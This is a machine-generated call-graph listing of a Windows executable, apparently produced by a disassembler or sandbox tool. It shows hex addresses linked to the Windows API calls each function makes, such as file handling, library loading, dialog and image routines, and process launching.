25ab20 23649->23652 23651->23647 23651->23649 23652->23647 23653 25ab2f WideCharToMultiByte 23652->23653 23653->23647 23654 25ab6f 23653->23654 23666 25abc3 20 API calls _free 23654->23666 23667 25ac98 23656->23667 23659 25af9c 23662 24fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23659->23662 23661 25afdc LCMapStringW 23661->23659 23663 25aa60 23662->23663 23663->23638 23663->23644 23663->23645 23664->23638 23665->23633 23666->23638 23668 25acc8 23667->23668 23671 25acc4 23667->23671 23668->23659 23674 25aff4 10 API calls 3 library calls 23668->23674 23669 25ace8 23669->23668 23672 25acf4 GetProcAddress 23669->23672 23671->23668 23671->23669 23675 25ad34 23671->23675 23673 25ad04 _unexpected 23672->23673 23673->23668 23674->23661 23676 25ad55 LoadLibraryExW 23675->23676 23681 25ad4a 23675->23681 23677 25ad72 GetLastError 23676->23677 23680 25ad8a 23676->23680 23679 25ad7d LoadLibraryExW 23677->23679 23677->23680 23678 25ada1 FreeLibrary 23678->23681 23679->23680 23680->23678 23680->23681 23681->23671 23682->23608 23683->23561 25365 25c030 GetProcessHeap 25366 24a400 GdipDisposeImage GdipFree 25367 24d600 70 API calls 25368 256000 QueryPerformanceFrequency QueryPerformanceCounter 25370 25f200 51 API calls 25414 252900 6 API calls 4 library calls 25416 25a700 21 API calls 25418 231710 86 API calls 25419 24ad10 73 API calls 25421 257f6e 52 API calls 3 library calls 25373 258268 55 API calls _free 25374 24c793 107 API calls 5 library calls 25422 231f72 128 API calls __EH_prolog 25375 24a070 10 API calls 25377 24b270 99 API calls 25378 231075 84 API calls 25240 239a74 25244 239a7e 25240->25244 25241 239b9d SetFilePointer 25242 239ab1 25241->25242 25243 239bb6 GetLastError 25241->25243 25243->25242 25244->25241 25244->25242 25245 23981a 79 API calls 25244->25245 25246 239b79 25244->25246 25245->25246 25246->25241 25248 239f7a 25249 239f8f 25248->25249 25254 239f88 25248->25254 25250 239f9c GetStdHandle 25249->25250 25258 239fab 25249->25258 25250->25258 25251 23a003 WriteFile 25251->25258 25252 239fd4 WriteFile 25253 239fcf 25252->25253 25252->25258 25253->25252 25253->25258 25256 23a095 25260 236e98 77 API calls 25256->25260 25258->25251 25258->25252 25258->25253 25258->25254 25258->25256 25259 236baa 78 API calls 25258->25259 25259->25258 25260->25254 25380 24a440 GdipCloneImage GdipAlloc 25381 253a40 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25426 261f40 CloseHandle 25383 24e455 14 API calls ___delayLoadHelper2@8 25299 24cd58 25301 24ce22 25299->25301 25306 24cd7b _wcschr 25299->25306 25300 24b314 ExpandEnvironmentStringsW 25315 24c793 _wcslen _wcsrchr 25300->25315 25301->25315 25327 24d78f 25301->25327 25303 24d40a 25305 241fbb CompareStringW 25305->25306 25306->25301 25306->25305 25307 24ca67 SetWindowTextW 25307->25315 25310 253e3e 22 API calls 25310->25315 25312 24c855 SetFileAttributesW 25313 24c90f GetFileAttributesW 25312->25313 25325 24c86f __cftof _wcslen 25312->25325 25313->25315 25317 24c921 DeleteFileW 25313->25317 25315->25300 25315->25303 25315->25307 25315->25310 25315->25312 25318 24cc31 GetDlgItem SetWindowTextW SendMessageW 25315->25318 25322 24cc71 SendMessageW 25315->25322 25326 241fbb CompareStringW 25315->25326 25351 24a64d GetCurrentDirectoryW 25315->25351 25353 23a5d1 6 API calls 25315->25353 25354 23a55a FindClose 25315->25354 25355 24b48e 76 API calls 2 library calls 25315->25355 25317->25315 25319 24c932 25317->25319 25318->25315 25320 234092 _swprintf 51 API calls 25319->25320 25321 24c952 GetFileAttributesW 25320->25321 25321->25319 25323 24c967 MoveFileW 25321->25323 25322->25315 25323->25315 25324 24c97f MoveFileExW 25323->25324 25324->25315 25325->25313 25325->25315 25352 23b991 51 API calls 3 library calls 25325->25352 25326->25315 25328 24d799 __cftof _wcslen 25327->25328 25329 24d8a5 25328->25329 25330 24d9e7 25328->25330 25331 24d9c0 25328->25331 25356 241fbb CompareStringW 25328->25356 25333 23a231 3 API calls 25329->25333 25330->25315 25331->25330 25334 24d9de ShowWindow 25331->25334 25335 24d8ba 25333->25335 25334->25330 25336 24d8d9 ShellExecuteExW 25335->25336 25357 23b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 25335->25357 25336->25330 25343 24d8ec 25336->25343 25338 24d8d1 25338->25336 25339 24d925 25358 24dc3b 6 API calls 25339->25358 25340 24d97b CloseHandle 25341 24d994 25340->25341 25342 24d989 25340->25342 25341->25331 25359 241fbb CompareStringW 25342->25359 25343->25339 25343->25340 25345 24d91b ShowWindow 25343->25345 25345->25339 25347 24d93d 25347->25340 25348 24d950 GetExitCodeProcess 25347->25348 25348->25340 25349 24d963 25348->25349 25349->25340 25351->25315 25352->25325 25353->25315 25354->25315 25355->25315 25356->25329 25357->25338 25358->25347 25359->25341 25429 24eda7 48 API calls _unexpected 25430 24f3a0 27 API calls 25387 25a4a0 71 API calls _free 25388 24dca1 DialogBoxParamW 25389 2608a0 IsProcessorFeaturePresent 25431 236faa 111 API calls 3 library calls 25433 24b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 23421 24e5b1 23422 24e578 23421->23422 23424 24e85d 23422->23424 23450 24e5bb 23424->23450 23426 24e86d 23427 24e8ca 23426->23427 23437 24e8ee 23426->23437 23428 24e7fb DloadReleaseSectionWriteAccess 6 API calls 23427->23428 23429 24e8d5 RaiseException 23428->23429 23430 24eac3 23429->23430 23430->23422 23431 24e9d9 23436 24ea37 GetProcAddress 23431->23436 23444 24ea95 23431->23444 23432 24e966 LoadLibraryExA 23433 24e9c7 23432->23433 23434 24e979 GetLastError 23432->23434 23433->23431 23438 24e9d2 FreeLibrary 23433->23438 23435 24e9a2 23434->23435 23446 24e98c 23434->23446 23439 24e7fb DloadReleaseSectionWriteAccess 6 API calls 23435->23439 23440 24ea47 GetLastError 23436->23440 23436->23444 23437->23431 23437->23432 23437->23433 23437->23444 23438->23431 23441 24e9ad RaiseException 23439->23441 23447 24ea5a 23440->23447 23441->23430 23443 24e7fb DloadReleaseSectionWriteAccess 6 API calls 23445 24ea7b RaiseException 23443->23445 23459 24e7fb 23444->23459 23448 24e5bb ___delayLoadHelper2@8 6 API calls 23445->23448 23446->23433 23446->23435 23447->23443 23447->23444 23449 24ea92 23448->23449 23449->23444 23451 24e5c7 23450->23451 23452 24e5ed 23450->23452 23467 24e664 23451->23467 23452->23426 23454 24e5cc 23455 24e5e8 23454->23455 23470 24e78d 23454->23470 23475 24e5ee GetModuleHandleW GetProcAddress GetProcAddress 23455->23475 23458 24e836 23458->23426 23460 24e80d 23459->23460 23461 24e82f 23459->23461 23462 24e664 DloadReleaseSectionWriteAccess 3 API calls 23460->23462 23461->23430 23464 24e812 23462->23464 23463 24e82a 23478 24e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23463->23478 23464->23463 23465 24e78d DloadProtectSection 3 API calls 23464->23465 23465->23463 23476 24e5ee GetModuleHandleW GetProcAddress GetProcAddress 23467->23476 23469 24e669 23469->23454 23471 24e7a2 DloadProtectSection 23470->23471 23472 24e7dd VirtualProtect 23471->23472 23473 24e7a8 23471->23473 23477 24e6a3 VirtualQuery GetSystemInfo 23471->23477 23472->23473 23473->23455 23475->23458 23476->23469 23477->23472 23478->23461 23687 24f3b2 23688 24f3be ___scrt_is_nonwritable_in_current_image 23687->23688 23719 24eed7 23688->23719 23690 24f3c5 23691 24f518 23690->23691 23694 24f3ef 23690->23694 23792 24f838 4 API calls 2 library calls 23691->23792 23693 24f51f 23785 257f58 23693->23785 23705 24f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23694->23705 23730 258aed 23694->23730 23701 24f40e 23703 24f48f 23738 24f953 GetStartupInfoW __cftof 23703->23738 23705->23703 23788 257af4 38 API calls 2 library calls 23705->23788 23706 24f495 23739 258a3e 51 API calls 23706->23739 23708 24f49d 23740 24df1e 23708->23740 23713 24f4b1 23713->23693 23714 24f4b5 23713->23714 23715 24f4be 23714->23715 23790 257efb 28 API calls _abort 23714->23790 23791 24f048 12 API calls ___scrt_uninitialize_crt 23715->23791 23718 24f4c6 23718->23701 23720 24eee0 23719->23720 23794 24f654 IsProcessorFeaturePresent 23720->23794 23722 24eeec 23795 252a5e 23722->23795 23724 24eef1 23729 24eef5 23724->23729 23803 258977 23724->23803 23727 24ef0c 23727->23690 23729->23690 23731 258b04 23730->23731 23732 24fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23731->23732 23733 24f408 23732->23733 23733->23701 23734 258a91 23733->23734 23735 258ac0 23734->23735 23736 24fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23735->23736 23737 258ae9 23736->23737 23737->23705 23738->23706 23739->23708 23903 240863 23740->23903 23744 24df3d 23952 24ac16 23744->23952 23746 24df46 __cftof 23747 24df59 GetCommandLineW 23746->23747 23748 24dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23747->23748 23749 24df68 23747->23749 23967 234092 23748->23967 23956 24c5c4 23749->23956 23755 24df76 OpenFileMappingW 23759 24dfd6 CloseHandle 23755->23759 23760 24df8f MapViewOfFile 23755->23760 23756 24dfe0 23961 24dbde 23756->23961 23759->23748 23762 24dfcd UnmapViewOfFile 23760->23762 23764 24dfa0 __InternalCxxFrameHandler 23760->23764 23762->23759 23767 24dbde 2 API calls 23764->23767 23769 24dfbc 23767->23769 23768 2490b7 8 API calls 23770 24e0aa DialogBoxParamW 23768->23770 23769->23762 23771 24e0e4 23770->23771 23772 24e0f6 Sleep 23771->23772 23773 24e0fd 23771->23773 23772->23773 23775 24e10b 23773->23775 24000 24ae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 23773->24000 23776 24e12a DeleteObject 23775->23776 23777 24e146 23776->23777 23778 24e13f DeleteObject 23776->23778 23779 24e177 23777->23779 23780 24e189 23777->23780 23778->23777 24001 24dc3b 6 API calls 23779->24001 23997 24ac7c 23780->23997 23782 24e17d CloseHandle 23782->23780 23784 24e1c3 23789 24f993 GetModuleHandleW 23784->23789 24252 257cd5 23785->24252 23788->23703 23789->23713 23790->23715 23791->23718 23792->23693 23794->23722 23807 253b07 23795->23807 23799 252a6f 23800 252a7a 23799->23800 23821 253b43 DeleteCriticalSection 23799->23821 23800->23724 23802 252a67 23802->23724 23850 25c05a 23803->23850 23806 252a7d 7 API calls 2 library calls 23806->23729 23808 253b10 23807->23808 23810 253b39 23808->23810 23811 252a63 23808->23811 23822 253d46 23808->23822 23827 253b43 DeleteCriticalSection 23810->23827 23811->23802 23813 252b8c 23811->23813 23843 253c57 23813->23843 23817 252baf 23818 252bbc 23817->23818 23849 252bbf 6 API calls ___vcrt_FlsFree 23817->23849 23818->23799 23820 252ba1 23820->23799 23821->23802 23828 253c0d 23822->23828 23825 253d7e InitializeCriticalSectionAndSpinCount 23826 253d69 23825->23826 23826->23808 23827->23811 23829 253c26 23828->23829 23830 253c4f 23828->23830 23829->23830 23835 253b72 23829->23835 23830->23825 23830->23826 23833 253c3b GetProcAddress 23833->23830 23834 253c49 23833->23834 23834->23830 23836 253b7e ___vcrt_FlsSetValue 23835->23836 23837 253bf3 23836->23837 23838 253b95 LoadLibraryExW 23836->23838 23842 253bd5 LoadLibraryExW 23836->23842 23837->23830 23837->23833 23839 253bb3 GetLastError 23838->23839 23840 253bfa 23838->23840 23839->23836 23840->23837 23841 253c02 FreeLibrary 23840->23841 23841->23837 23842->23836 23842->23840 23844 253c0d ___vcrt_FlsSetValue 5 API calls 23843->23844 23845 253c71 23844->23845 23846 253c8a TlsAlloc 23845->23846 23847 252b96 23845->23847 23847->23820 23848 253d08 6 API calls ___vcrt_FlsSetValue 23847->23848 23848->23817 23849->23820 23853 25c077 23850->23853 23854 25c073 23850->23854 23851 24fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23852 24eefe 23851->23852 23852->23727 23852->23806 23853->23854 23856 25a6a0 23853->23856 23854->23851 23857 25a6ac ___scrt_is_nonwritable_in_current_image 23856->23857 23868 25ac31 EnterCriticalSection 23857->23868 23859 25a6b3 23869 25c528 23859->23869 23861 25a6c2 23862 25a6d1 23861->23862 23882 25a529 29 API calls 23861->23882 23884 25a6ed LeaveCriticalSection _abort 23862->23884 23865 25a6e2 _abort 23865->23853 23866 25a6cc 23883 25a5df GetStdHandle GetFileType 23866->23883 23868->23859 23870 25c534 ___scrt_is_nonwritable_in_current_image 23869->23870 23871 25c541 23870->23871 23872 25c558 23870->23872 23893 2591a8 20 API calls __dosmaperr 23871->23893 23885 25ac31 EnterCriticalSection 23872->23885 23875 25c546 23894 259087 26 API calls __cftof 23875->23894 23877 25c550 _abort 23877->23861 23878 25c590 23895 25c5b7 LeaveCriticalSection _abort 23878->23895 23879 25c564 23879->23878 23886 25c479 23879->23886 23882->23866 23883->23862 23884->23865 23885->23879 23887 25b136 _unexpected 20 API calls 23886->23887 23888 25c48b 23887->23888 23892 25c498 23888->23892 23896 25af0a 23888->23896 23889 258dcc _free 20 API calls 23890 25c4ea 23889->23890 23890->23879 23892->23889 23893->23875 23894->23877 23895->23877 23897 25ac98 _unexpected 5 API calls 23896->23897 23898 25af31 23897->23898 23899 25af4f InitializeCriticalSectionAndSpinCount 23898->23899 23900 25af3a 23898->23900 23899->23900 23901 24fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23900->23901 23902 25af66 23901->23902 23902->23888 24002 24ec50 23903->24002 23906 2408e7 23908 240c14 GetModuleFileNameW 23906->23908 24013 2575fb 42 API calls __vsnwprintf_l 23906->24013 23907 240888 GetProcAddress 23909 2408a1 23907->23909 23910 2408b9 GetProcAddress 23907->23910 23919 240c32 23908->23919 23909->23910 23912 2408cb 23910->23912 23912->23906 23913 240b54 23913->23908 23914 240b5f GetModuleFileNameW CreateFileW 23913->23914 23915 240b8f SetFilePointer 23914->23915 23916 240c08 CloseHandle 23914->23916 23915->23916 23917 240b9d ReadFile 23915->23917 23916->23908 23917->23916 23920 240bbb 23917->23920 23922 240c94 GetFileAttributesW 23919->23922 23923 240cac 23919->23923 23925 240c5d CompareStringW 23919->23925 24004 23b146 23919->24004 24007 24081b 23919->24007 23920->23916 23924 24081b 2 API calls 23920->23924 23922->23919 23922->23923 23926 240cb7 23923->23926 23928 240cec 23923->23928 23924->23920 23925->23919 23929 240cd0 GetFileAttributesW 23926->23929 23931 240ce8 23926->23931 23927 240dfb 23951 24a64d GetCurrentDirectoryW 23927->23951 23928->23927 23930 23b146 GetVersionExW 23928->23930 23929->23926 23929->23931 23932 240d06 23930->23932 23931->23928 23933 240d73 23932->23933 23934 240d0d 23932->23934 23935 234092 _swprintf 51 API calls 23933->23935 23936 24081b 2 API calls 23934->23936 23937 240d9b AllocConsole 23935->23937 23938 240d17 23936->23938 23939 240df3 ExitProcess 23937->23939 23940 240da8 GetCurrentProcessId AttachConsole 23937->23940 23941 24081b 2 API calls 23938->23941 24018 253e13 23940->24018 23943 240d21 23941->23943 24014 23e617 23943->24014 23944 240dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 23944->23939 23947 234092 _swprintf 51 API calls 23948 240d4f 23947->23948 23949 23e617 53 API calls 23948->23949 23950 240d5e 23949->23950 23950->23939 23951->23744 23953 24081b 2 API calls 23952->23953 23954 24ac2a OleInitialize 23953->23954 23955 24ac4d GdiplusStartup SHGetMalloc 23954->23955 23955->23746 23957 24c5ce 23956->23957 23958 241fac CharUpperW 23957->23958 23959 24c6e4 23957->23959 24043 23f3fa 82 API calls 2 library calls 23957->24043 23958->23957 23959->23755 23959->23756 23962 24ec50 23961->23962 23963 24dbeb SetEnvironmentVariableW 23962->23963 23964 24dc0e 23963->23964 23965 24dc36 23964->23965 23966 24dc2a SetEnvironmentVariableW 23964->23966 23965->23748 23966->23965 24044 234065 23967->24044 23970 24b6dd LoadBitmapW 23971 24b6fe 23970->23971 23972 24b70b GetObjectW 23970->23972 24078 24a6c2 FindResourceW 23971->24078 23974 24b71a 23972->23974 24073 24a5c6 23974->24073 23978 24b770 23989 23da42 23978->23989 23979 24b74c 24094 24a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23979->24094 23981 24a6c2 13 API calls 23983 24b73d 23981->23983 23982 24b754 24095 24a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23982->24095 23983->23979 23984 24b743 DeleteObject 23983->23984 23984->23979 23986 24b75d 24096 24a80c 8 API calls 23986->24096 23988 24b764 DeleteObject 23988->23978 24107 23da67 23989->24107 23994 2490b7 24240 24eb38 23994->24240 23998 24acab GdiplusShutdown CoUninitialize 23997->23998 23998->23784 24000->23775 24001->23782 24003 24086d GetModuleHandleW 24002->24003 24003->23906 24003->23907 24005 23b15a GetVersionExW 24004->24005 24006 23b196 24004->24006 24005->24006 24006->23919 24008 24ec50 24007->24008 24009 240828 GetSystemDirectoryW 24008->24009 24010 240840 24009->24010 24011 24085e 24009->24011 24012 240851 LoadLibraryW 24010->24012 24011->23919 24012->24011 24013->23913 24015 23e627 24014->24015 24020 23e648 24015->24020 24019 253e1b 24018->24019 24019->23944 24019->24019 24026 23d9b0 24020->24026 24023 23e645 24023->23947 24024 23e66b LoadStringW 24024->24023 24025 23e682 LoadStringW 24024->24025 24025->24023 24031 23d8ec 24026->24031 24028 23d9cd 24029 23d9e2 24028->24029 24039 23d9f0 26 API calls 24028->24039 24029->24023 24029->24024 24032 23d904 24031->24032 24038 23d984 _strncpy 24031->24038 24034 23d928 24032->24034 24040 241da7 WideCharToMultiByte 24032->24040 24037 23d959 24034->24037 24041 23e5b1 50 API calls __vsnprintf 24034->24041 24042 256159 26 API calls 3 library calls 24037->24042 24038->24028 24039->24029 24040->24034 24041->24037 24042->24038 24043->23957 24045 23407c __vsnwprintf_l 24044->24045 24048 255fd4 24045->24048 24051 254097 24048->24051 24052 2540d7 24051->24052 24053 2540bf 24051->24053 24052->24053 24054 2540df 24052->24054 24068 2591a8 20 API calls __dosmaperr 24053->24068 24056 254636 __fassign 38 API calls 24054->24056 24058 2540ef 24056->24058 24057 2540c4 24069 259087 26 API calls __cftof 24057->24069 24070 254601 20 API calls 2 library calls 24058->24070 24061 24fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24063 234086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 24061->24063 24062 254167 24071 2549e6 51 API calls 3 library calls 24062->24071 24063->23970 24065 254172 24072 2546b9 20 API calls _free 24065->24072 24067 2540cf 24067->24061 24068->24057 24069->24067 24070->24062 24071->24065 24072->24067 24097 24a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24073->24097 24075 24a5cd 24076 24a5d9 24075->24076 24098 24a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24075->24098 24076->23978 24076->23979 24076->23981 24079 24a6e5 SizeofResource 24078->24079 24080 24a7d3 24078->24080 24079->24080 24081 24a6fc LoadResource 24079->24081 24080->23972 24080->23974 24081->24080 24082 24a711 LockResource 24081->24082 24082->24080 24083 24a722 GlobalAlloc 24082->24083 24083->24080 24084 24a73d GlobalLock 24083->24084 24085 24a7cc GlobalFree 24084->24085 24086 24a74c __InternalCxxFrameHandler 24084->24086 24085->24080 24087 24a754 CreateStreamOnHGlobal 24086->24087 24088 24a7c5 GlobalUnlock 24087->24088 24089 24a76c 24087->24089 24088->24085 24099 24a626 GdipAlloc 24089->24099 24092 24a7b0 24092->24088 24093 24a79a GdipCreateHBITMAPFromBitmap 24093->24092 24094->23982 24095->23986 24096->23988 24097->24075 24098->24076 24100 24a645 24099->24100 24101 24a638 24099->24101 24100->24088 24100->24092 24100->24093 24103 24a3b9 24101->24103 24104 24a3e1 GdipCreateBitmapFromStream 24103->24104 24105 24a3da GdipCreateBitmapFromStreamICM 24103->24105 24106 24a3e6 24104->24106 24105->24106 24106->24100 24108 23da75 _wcschr __EH_prolog 24107->24108 24109 23daa4 GetModuleFileNameW 24108->24109 24110 23dad5 24108->24110 24111 23dabe 24109->24111 24153 2398e0 24110->24153 24111->24110 24113 23db31 24164 256310 24113->24164 24117 23e261 78 API calls 24119 23db05 24117->24119 24118 23db44 24120 256310 26 API calls 24118->24120 24119->24113 24119->24117 24132 23dd4a 24119->24132 24128 23db56 ___vcrt_FlsSetValue 24120->24128 24121 23dc85 24121->24132 24200 239d70 81 API calls 24121->24200 24125 23dc9f ___std_exception_copy 24126 239bd0 82 API calls 24125->24126 24125->24132 24129 23dcc8 ___std_exception_copy 24126->24129 24128->24121 24128->24132 24178 239e80 24128->24178 24194 239bd0 24128->24194 24199 239d70 81 API calls 24128->24199 24131 23dcd3 ___vcrt_FlsSetValue _wcslen ___std_exception_copy 24129->24131 24129->24132 24201 241b84 MultiByteToWideChar 24129->24201 24131->24132 24133 23e159 24131->24133 24148 241da7 WideCharToMultiByte 24131->24148 24202 23e5b1 50 API calls __vsnprintf 24131->24202 24203 256159 26 API calls 3 library calls 24131->24203 24204 258cce 26 API calls 2 library calls 24131->24204 24205 257625 26 API calls 2 library calls 24131->24205 24206 23e27c 78 API calls 24131->24206 24187 23959a 24132->24187 24135 23e1de 24133->24135 24207 258cce 26 API calls 2 library calls 24133->24207 24138 23e214 24135->24138 24142 23e261 78 API calls 24135->24142 24136 23e16e 24208 257625 26 API calls 2 library calls 24136->24208 24143 256310 26 API calls 24138->24143 24140 23e1c6 24209 23e27c 78 API calls 24140->24209 24142->24135 24144 23e22d 24143->24144 24145 256310 26 API calls 24144->24145 24145->24132 24148->24131 24151 23e29e GetModuleHandleW FindResourceW 24152 23da55 24151->24152 24152->23994 24154 2398ea 24153->24154 24155 23994b CreateFileW 24154->24155 24156 23996c GetLastError 24155->24156 24160 2399bb 24155->24160 24210 23bb03 24156->24210 24158 23998c 24159 239990 CreateFileW GetLastError 24158->24159 24158->24160 24159->24160 24162 2399b5 24159->24162 24161 2399ff 24160->24161 24163 2399e5 SetFileTime 24160->24163 24161->24119 24162->24160 24163->24161 24165 256349 24164->24165 24166 25634d 24165->24166 24177 256375 24165->24177 24214 2591a8 20 API calls __dosmaperr 24166->24214 24168 256699 24170 24fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24168->24170 24169 256352 24215 259087 26 API calls __cftof 24169->24215 24172 2566a6 24170->24172 24172->24118 24173 25635d 24174 24fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24173->24174 24176 256369 24174->24176 24176->24118 24177->24168 24216 256230 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24177->24216 24179 239e92 24178->24179 24180 239ea5 24178->24180 24184 239eb0 24179->24184 24217 236d5b 77 API calls 24179->24217 24182 239eb8 SetFilePointer 24180->24182 24180->24184 24183 239ed4 GetLastError 24182->24183 24182->24184 24183->24184 24185 239ede 24183->24185 24184->24128 24185->24184 24218 236d5b 77 API calls 24185->24218 24188 2395be 24187->24188 24193 2395cf 24187->24193 24189 2395d1 24188->24189 24190 2395ca 24188->24190 24188->24193 24224 239620 24189->24224 24219 23974e 24190->24219 24193->24151 24196 239bdc 24194->24196 24198 239be3 24194->24198 24195 239785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 24195->24198 24196->24128 24198->24195 24198->24196 24239 236d1a 77 API calls 24198->24239 24199->24128 24200->24125 24201->24131 24202->24131 24203->24131 24204->24131 24205->24131 24206->24131 24207->24136 24208->24140 24209->24135 24211 23bb10 _wcslen 24210->24211 24212 23bbb8 GetCurrentDirectoryW 24211->24212 24213 23bb39 _wcslen 24211->24213 24212->24213 24213->24158 24214->24169 24215->24173 24216->24177 24217->24180 24218->24184 24220 239781 24219->24220 24223 239757 24219->24223 24220->24193 24223->24220 24230 23a1e0 24223->24230 24225 23962c 24224->24225 24227 23964a 24224->24227 24225->24227 24228 239638 CloseHandle 24225->24228 24226 239669 24226->24193 24227->24226 24238 236bd5 76 API calls 24227->24238 24228->24227 24231 24ec50 24230->24231 24232 23a1ed DeleteFileW 24231->24232 24233 23a200 24232->24233 24234 23977f 24232->24234 24235 23bb03 GetCurrentDirectoryW 24233->24235 24234->24193 24236 23a214 24235->24236 24236->24234 24237 23a218 DeleteFileW 24236->24237 24237->24234 24238->24226 24239->24198 24242 24eb3d ___std_exception_copy 24240->24242 24241 2490d6 24241->23768 24242->24241 24246 24eb59 24242->24246 24249 257a5e 7 API calls 2 library calls 24242->24249 24244 24f5c9 24251 25238d RaiseException 24244->24251 24246->24244 24250 25238d RaiseException 24246->24250 24247 24f5e6 24249->24242 24250->24244 24251->24247 24253 257ce1 _unexpected 24252->24253 24254 257ce8 24253->24254 24255 257cfa 24253->24255 24288 257e2f GetModuleHandleW 24254->24288 24276 25ac31 EnterCriticalSection 24255->24276 24258 257ced 24258->24255 24289 257e73 GetModuleHandleExW 24258->24289 24259 257d9f 24277 257ddf 24259->24277 24263 257d01 24263->24259 24265 257d76 24263->24265 24297 2587e0 20 API calls _abort 24263->24297 24266 257d8e 24265->24266 24270 258a91 _abort 5 API calls 24265->24270 24271 258a91 _abort 5 API calls 24266->24271 24267 257dbc 24280 257dee 24267->24280 24268 257de8 24298 262390 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24268->24298 24270->24266 24271->24259 24276->24263 24299 25ac81 LeaveCriticalSection 24277->24299 24279 257db8 24279->24267 24279->24268 24300 25b076 24280->24300 24283 257e1c 24286 257e73 _abort 8 API calls 24283->24286 24284 257dfc GetPEB 24284->24283 24285 257e0c GetCurrentProcess TerminateProcess 24284->24285 24285->24283 24287 257e24 ExitProcess 24286->24287 24288->24258 24290 257ec0 24289->24290 24291 257e9d GetProcAddress 24289->24291 24293 257ec6 FreeLibrary 24290->24293 24294 257ecf 24290->24294 24292 257eb2 24291->24292 24292->24290 24293->24294 24295 24fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24294->24295 24296 257cf9 24295->24296 24296->24255 24297->24265 24299->24279 24301 25b09b 24300->24301 24304 25b091 24300->24304 24302 25ac98 _unexpected 5 API calls 24301->24302 24302->24304 24303 24fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24305 257df8 24303->24305 24304->24303 24305->24283 24305->24284 25435 241bbd GetCPInfo IsDBCSLeadByte 25436 25b1b8 27 API calls 3 library calls 25392 24c793 102 API calls 5 library calls 25438 249580 6 API calls 25440 24b18d 78 API calls 25393 24c793 97 API calls 4 library calls 24323 2313e1 84 API calls 2 library calls 24324 24eae7 24325 24eaf1 24324->24325 24326 24e85d ___delayLoadHelper2@8 14 API calls 24325->24326 24327 24eafe 24326->24327 25395 24f4e7 29 API calls _abort 24328 24b7e0 24329 24b7ea __EH_prolog 24328->24329 24496 231316 24329->24496 24332 24bf0f 24561 24d69e 24332->24561 24333 24b82a 24336 24b838 24333->24336 24337 24b89b 24333->24337 24411 24b841 24333->24411 24338 24b83c 24336->24338 24339 24b878 24336->24339 24342 24b92e GetDlgItemTextW 24337->24342 24346 24b8b1 24337->24346 24347 23e617 53 API calls 24338->24347 24338->24411 24349 24b95f KiUserCallbackDispatcher 24339->24349 24339->24411 24340 24bf38 24343 24bf41 SendDlgItemMessageW 24340->24343 24344 24bf52 GetDlgItem SendMessageW 24340->24344 24341 24bf2a SendMessageW 24341->24340 24342->24339 24345 24b96b 24342->24345 24343->24344 24579 24a64d GetCurrentDirectoryW 24344->24579 24350 24b980 GetDlgItem 24345->24350 24494 24b974 24345->24494 24351 23e617 53 API calls 24346->24351 24352 24b85b 24347->24352 24349->24411 24354 24b994 SendMessageW SendMessageW 24350->24354 24355 24b9b7 SetFocus 24350->24355 24356 24b8ce SetDlgItemTextW 24351->24356 24601 23124f SHGetMalloc 24352->24601 24353 24bf82 GetDlgItem 24360 24bfa5 SetWindowTextW 24353->24360 24361 24bf9f 24353->24361 24354->24355 24357 24b9c7 24355->24357 24371 24b9e0 24355->24371 24358 24b8d9 24356->24358 24362 23e617 53 API calls 24357->24362 24365 24b8e6 GetMessageW 24358->24365 24358->24411 24580 24abab GetClassNameW 24360->24580 24361->24360 24366 24b9d1 24362->24366 24363 24be55 24367 23e617 53 API calls 24363->24367 24369 24b8fd IsDialogMessageW 24365->24369 24365->24411 24602 24d4d4 24366->24602 24373 24be65 SetDlgItemTextW 24367->24373 24369->24358 24375 24b90c TranslateMessage DispatchMessageW 24369->24375 24378 23e617 53 API calls 24371->24378 24372 24c1fc SetDlgItemTextW 24372->24411 24376 24be79 24373->24376 24375->24358 24381 23e617 53 API calls 24376->24381 24380 24ba17 24378->24380 24379 24bff0 24385 24c020 24379->24385 24388 23e617 53 API calls 24379->24388 24386 234092 _swprintf 51 API calls 24380->24386 24414 24be9c _wcslen 24381->24414 24382 24b9d9 24506 23a0b1 24382->24506 24383 24c73f 97 API calls 24383->24379 24393 24c73f 97 API calls 24385->24393 24438 24c0d8 24385->24438 24389 24ba29 24386->24389 24392 24c003 SetDlgItemTextW 24388->24392 24395 24d4d4 16 API calls 24389->24395 24390 24ba68 GetLastError 24391 24ba73 24390->24391 24512 24ac04 SetCurrentDirectoryW 24391->24512 24399 23e617 53 API calls 24392->24399 24401 24c03b 24393->24401 24394 24c18b 24396 24c194 EnableWindow 24394->24396 24397 24c19d 24394->24397 24395->24382 24396->24397 24402 24c1ba 24397->24402 24620 2312d3 GetDlgItem EnableWindow 24397->24620 24398 24beed 24405 23e617 53 API calls 24398->24405 24403 24c017 SetDlgItemTextW 24399->24403 24412 24c04d 24401->24412 24435 24c072 24401->24435 24408 24c1e1 